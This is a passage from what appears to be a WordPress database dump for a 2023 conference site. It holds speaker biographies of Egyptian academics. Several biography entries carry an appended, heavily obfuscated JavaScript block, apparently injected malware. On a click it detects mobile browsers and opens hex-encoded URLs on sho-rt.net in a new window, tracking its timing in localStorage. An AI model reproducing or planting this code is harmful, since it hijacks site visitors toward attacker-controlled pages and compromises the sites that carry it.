Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Local Scientific Committee','','inherit','closed','closed','','3554-revision-v1','','','2023-03-28 14:20:51','2023-03-28 14:20:51','',3554,'https://gsw2023.com/?p=3944',0,'revision','',0),
(3945,1,'2023-03-28 14:22:08','2023-03-28 14:22:08','','dr-Yousry','','inherit','open','closed','','dr-yousry','','','2023-03-28 14:22:08','2023-03-28 14:22:08','',3943,'https://gsw2023.com/wp-content/uploads/2023/03/dr-Yousry.bmp',0,'attachment','image/bmp',0),
(3948,1,'2023-04-02 07:05:06','2023-04-02 07:05:06','<!-- wp:paragraph -->\n<p><strong>Arab Academy for Science and Technology and Maritime Transport, Alexandria, Egypt.</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Saleh Mesbah Elkaffas is an Associate Professor at the Department of Information Systems, College of Computing and Information Technology, Arab Academy for Science, Technology and Maritime Transport (AASTMT). He served as the director of the Remote Sensing and Spatial Studies Unit, College of Engineering and Technology, AASTMT.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Saleh Mesbah Elkaffas received his B.Sc. in Electronics and Telecommunications Engineering and M.Sc. in “Information Content in Remote Sensing Data” from Alexandria University, Egypt. He obtained his Ph.D. degree from the Center for Remote Sensing, Imperial College, UK, and Alexandria University, under the Scientific Channel System supervision.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With over 35 years of experience in Remote Sensing, GIS, Computing, and Information Technology, Dr. Elkaffas has contributed actively to these fields. He has published over 90 research papers and book chapters on topics such as Remote Sensing, Geographic Information Systems (GIS), Intelligent Systems and Computing, and Applied Geomatics.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Elkaffas\' research interests include Satellite Remote Sensing, Digital Image Processing, Geographic Information Systems (GIS), Global Positioning Systems (GPS), Geomatics, Information Technology, and Environmental Management.</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Dr. Saleh Mesbah Elkaffas</strong>','','publish','closed','closed','','dr-saleh-mesbah-elkaffas','','','2023-04-02 07:31:42','2023-04-02 07:31:42','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3948',0,'dt_team','',0),
(3949,1,'2023-03-28 14:49:41','2023-03-28 14:49:41','','dr-saleh','','inherit','open','closed','','dr-saleh','','','2023-03-28 14:49:41','2023-03-28 14:49:41','',3948,'https://gsw2023.com/wp-content/uploads/2023/03/dr-saleh.bmp',0,'attachment','image/bmp',0),
(3950,1,'2023-03-28 15:03:59','2023-03-28 15:03:59','<!-- wp:paragraph -->\n<p><strong>Dean, College of Engineering and Technology,<br>Professor of Port Planning and Coastal Engineering,<br>Arab Academy for Science, Technology &amp; Maritime<br>Transport</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>Prof. Akram obtained his BSc.Eng. in 1991 and his M.Sc. degree in 1998,<br>University of Alexandria, Egypt. He received his PhD degree in 2004<br>from the School of Civil Engineering, University of Nottingham, UK,</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>He was the dean of Port Training Institute from October 2008 to Feb<br>2022 and he is a member of the Peer Reviewer Committee of the Journal<br>of Marine Policy (JMP), and the International Associations of Maritime<br>Universities Conferences (IAMU). Furthermore, Prof. Akram was the<br>supervisor over a lot of Ph.D and Master students during the past years.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>He is the Head of the organizing /committee of the International<br>Maritime Transport and Logistics Conference “MARLOG”.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>He Published more than 40 research papers in proceedings and journals<br>in the field of Coastal Engineering, Marine Structures and Breakwaters,<br>his research interests also include Water Resources, Coastal Zone<br>Management and Sustainable Development</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Akram Soliman Elselmy','','publish','closed','closed','','prof-akram-soliman-elselmy','','','2023-04-02 06:55:31','2023-04-02 06:55:31','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3950',0,'dt_team','',0),
(3951,1,'2023-03-28 15:03:47','2023-03-28 15:03:47','','dr-akrm','','inherit','open','closed','','dr-akrm','','','2023-03-28 15:03:47','2023-03-28 15:03:47','',3950,'https://gsw2023.com/wp-content/uploads/2023/03/dr-akrm.bmp',0,'attachment','image/bmp',0),
(3952,1,'2022-02-19 15:06:22','2022-02-19 15:06:22','<!-- wp:paragraph -->\n<p><strong>Adel M. Belal, Prof. of Structural Engineering<br>Address: Arab Academy for Science, Technology and Maritime Transport,<br>Egypt, Cairo, Heliopolis,<br>Email: adel.belal@aast.edu<br>Web page: https://aast.edu/cv.php?disp_unit=&amp;ser=132300</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Biography<br></strong>Throughout Prof. Belal career life, he has graduated with an honored bachelor’s degree from<br>the Military Technical College (MTC) in 1983. He received a master\'s degree in 1991 from<br>MTC, then he received the Ph.D. in 1997 from University of Mississippi, USA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><br>He has specialized in Structural and Geotechnical Engineering, starting his career in the MTC<br>till 2012 as a faculty member, where all the positions were held. In 1999, His job progression<br>allowed him to be the Head of the Consulting 